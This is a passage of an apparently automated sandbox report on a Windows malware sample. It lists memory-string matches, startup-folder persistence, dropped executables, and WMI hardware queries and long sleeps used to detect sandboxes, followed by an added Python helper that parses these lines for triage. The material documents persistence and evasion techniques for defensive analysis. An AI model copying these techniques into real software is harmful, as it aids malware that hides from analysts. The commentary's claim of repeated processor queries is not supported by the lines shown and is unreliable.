Source: Yara match File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\btjxg.lnk
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: powershell.exe PID: 2284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTR
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_1248.TXT
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE\
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG66
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINSTA0\DEFAULT/E
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXER
Source: TypeId.exe, 00000007.00000002.2585257546.00000021F43E1000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: !TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINSTA0\DEFAULT
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPSPATHEXT=.COM;.EXE;.BAT;.C
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEV
Source: TypeId.exe, 00000002.00000002.2150010179.000002183E06B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 68PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E5A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0\USAGELOGS\TYPEID.EXE.LOG
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_1248.TXT
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEEPT]#
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2135131291.0000023435541000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE?
Source: TypeId.exe, 00000002.00000002.2148167261.000000A85ABE1000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEI
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E53E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEP^
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE|
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 9C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000007.00000002.2589739106.00000209253D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE$Z
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXEINE
Source: TypeId.exe, 00000007.00000002.2585257546.00000021F43E1000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: !C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEI
Source: TypeId.exe, 00000002.00000002.2162900944.0000021856A30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0\USAGELOGS\TYPEID.EXE.LOG
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE{"!0N
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXEIN
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ?C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG`_
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E53E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2163987282.0000021856C4A000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2163184946.0000021856AC4000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2149486171.000002183C580000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2589739106.00000209253D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2125823994.000002341AFA2000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CD1F000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2137559195.0000023435783000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150286073.000002183E0F4000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E5A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <COMMAND>C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE</COMMAND>
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE8
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: N\MICROSOFT\WINDOWS\AUDITRULETYPE\TYPEIDETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEPDATA\ROAMINGCOMMONPROGRAMFILEAMPL
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2136881834.0000023435705000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2149792202.000002183E051000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXEWQD
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TATEC:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_1248.TXTPE,<
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CCE2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148167261.000000A85ABE1000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXET5
Source: TypeId.exe, 00000007.00000002.2586408663.000002092517A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE+G
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319;C:\WINDOWS\SYSTEM32;C:\WINDOWS\SYSTEM;C:\WINDOWS;.;C:\PROGRAM FILES (X86)\COC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXENDOWS;C
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2137559195.0000023435783000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \TYPEID.EXE<
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIGAK&D
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE-<
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319;C:\WINDOWS\SYSTEM32;C:\WINDOWS\SYSTEM;C:\WINDOWS;.;C:\PROGRAM FILES (X86)\COC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXENDOWS;C-E
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIGTK
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE2
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \S-1-5-21-2246122658-3693405117-2476756634-1003YPEID.EXE
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Memory allocated: 2341C7D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Memory allocated: 23434990000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory allocated: 2183C4A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory allocated: 218561C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Memory allocated: 1260000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Memory allocated: 1B070000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory allocated: 20925400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Memory allocated: 2093ECE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 1199985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 1199875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7144 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Window / User API: threadDelayed 2226 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Window / User API: threadDelayed 7625 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2841
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe TID: 1860 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe TID: 5680 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe TID: 8112 Thread sleep time: -26747778906878833s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe TID: 7244 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -6456360425798339s >= -30000s
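The WMI hardware queries and the delay/sleep events in this section are the raw evidence behind the "Queries sensitive disk information" and "Tries to detect sandboxes" signatures: Win32_DiskDrive, Win32_BaseBoard and Win32_Processor expose the disk model, board manufacturer and CPU name strings that VM checks compare against hypervisor vendor names, and RegSvcs.exe re-queries Win32_Processor dozens of times. The script below is an added triage helper written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It parses lines of this "Source: <process> <event>" form, aggregates them per process image and emits findings. The embedded input is a constructed subset of the lines above, the REPEATED_WMI threshold is an assumption chosen for illustration, and lines of other kinds (memory strings, SetErrorMode) are ignored. It also keeps the 922337203685477 value apart from finite sleeps: that number is 0x8000000000000000, the relative timeout SleepEx(INFINITE) passes to NtDelayExecution, in 100 ns units divided by 10000, i.e. a thread parked indefinitely (a .NET main thread after Thread.Sleep(Timeout.Infinite), for instance), which is why only the 180000 ms and 1199985 ms waits from RegSvcs.exe earn the timed-sleep label.

```python
"""Added triage helper (not from the report): aggregate WMI hardware queries and
sleep/delay events from 'Source: <process> <event>' lines per process image."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# 0x8000000000000000 (Int64.MinValue in 100 ns units) is the relative timeout that
# SleepEx(INFINITE) passes to NtDelayExecution; divided by 10000 it is the
# 922337203685477 seen in the report. It marks a thread parked for good, e.g. a
# .NET main thread after Thread.Sleep(Timeout.Infinite), not a timed evasion sleep.
INFINITE_DELAY = 922337203685477
LONG_SLEEP_MS = 30_000       # threshold the report itself applies (">= -30000s")
REPEATED_WMI = 10            # assumed triage threshold for polling one WMI class
VM_FINGERPRINT = {"Win32_DiskDrive", "Win32_BaseBoard", "Win32_Processor"}

LINE_RE = re.compile(r"^Source:\s+(?P<proc>\S+)\s+(?P<event>.*?)(?:\s+Jump to behavior)?$")
WMI_RE = re.compile(r"^WMI Queries: IWbemServices::\w+ - [\w\\]+ : (?P<cls>\w+)$")
DELAY_RE = re.compile(r"^Thread delayed: delay time: (?P<ms>\d+)$")
SLEEP_RE = re.compile(r"^TID: \d+ Thread sleep time: -(?P<ms>\d+)s ")
API_RE = re.compile(r"^Window / User API: threadDelayed (?P<n>\d+)$")

@dataclass
class ProcStats:
    wmi_calls: dict = field(default_factory=lambda: defaultdict(int))  # class -> count
    delays_ms: list = field(default_factory=list)    # every wait seen, in ms
    sleep_loops: list = field(default_factory=list)  # "threadDelayed N" iteration counts

def classify_delay(ms):
    if ms >= INFINITE_DELAY:
        return "infinite"
    return "long" if ms >= LONG_SLEEP_MS else "short"

def parse_report(text):
    """Return {image name: ProcStats}; lines of other kinds are ignored."""
    stats = defaultdict(ProcStats)
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        image = m.group("proc").rsplit("\\", 1)[-1]  # key by image; merges same-named PIDs
        ev = m.group("event")
        if w := WMI_RE.match(ev):
            stats[image].wmi_calls[w.group("cls")] += 1
        elif d := (DELAY_RE.match(ev) or SLEEP_RE.match(ev)):
            stats[image].delays_ms.append(int(d.group("ms")))
        elif a := API_RE.match(ev):
            stats[image].sleep_loops.append(int(a.group("n")))
    return dict(stats)

def assess(stats):
    """Map each image to its findings; an empty list means nothing of note."""
    findings = {}
    for image, st in stats.items():
        notes = []
        classes = set(st.wmi_calls)
        if VM_FINGERPRINT <= classes:
            notes.append("wmi-vm-fingerprint")  # disk model + board vendor + CPU name
        elif classes & VM_FINGERPRINT:
            notes.append("wmi-hardware-query")
        notes += [f"wmi-polling:{c}x{n}" for c, n in st.wmi_calls.items() if n >= REPEATED_WMI]
        kinds = {classify_delay(ms) for ms in st.delays_ms}
        if "long" in kinds:
            notes.append("timed-sleep>=30s")
        if st.sleep_loops:
            notes.append("sleep-loop")
        if kinds == {"infinite"}:
            notes.append("infinite-wait-only (low signal)")
        findings[image] = notes
    return findings

# Constructed sample: a subset of the report lines above, plus the RegSvcs.exe
# Win32_Processor query repeated 12 times to stand in for the long run of them.
REGSVCS = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe TID: 1860 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 1199985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2676 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6150
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXEIN
""" + "\n".join(
    f"Source: {REGSVCS} WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Processor"
    for _ in range(12))

if __name__ == "__main__":
    for image, notes in assess(parse_report(SAMPLE_REPORT)).items():
        print(f"{image:20s} {', '.join(notes) or '-'}")
```

Run as a script it prints one line per image. Fed a whole report's Source: lines (or several reports concatenated), the wmi-polling and timed-sleep findings separate a process that fingerprints hardware in a loop from a .NET process whose main thread merely blocks forever, which the report's own ">= -30000s" heuristic lumps together.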
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
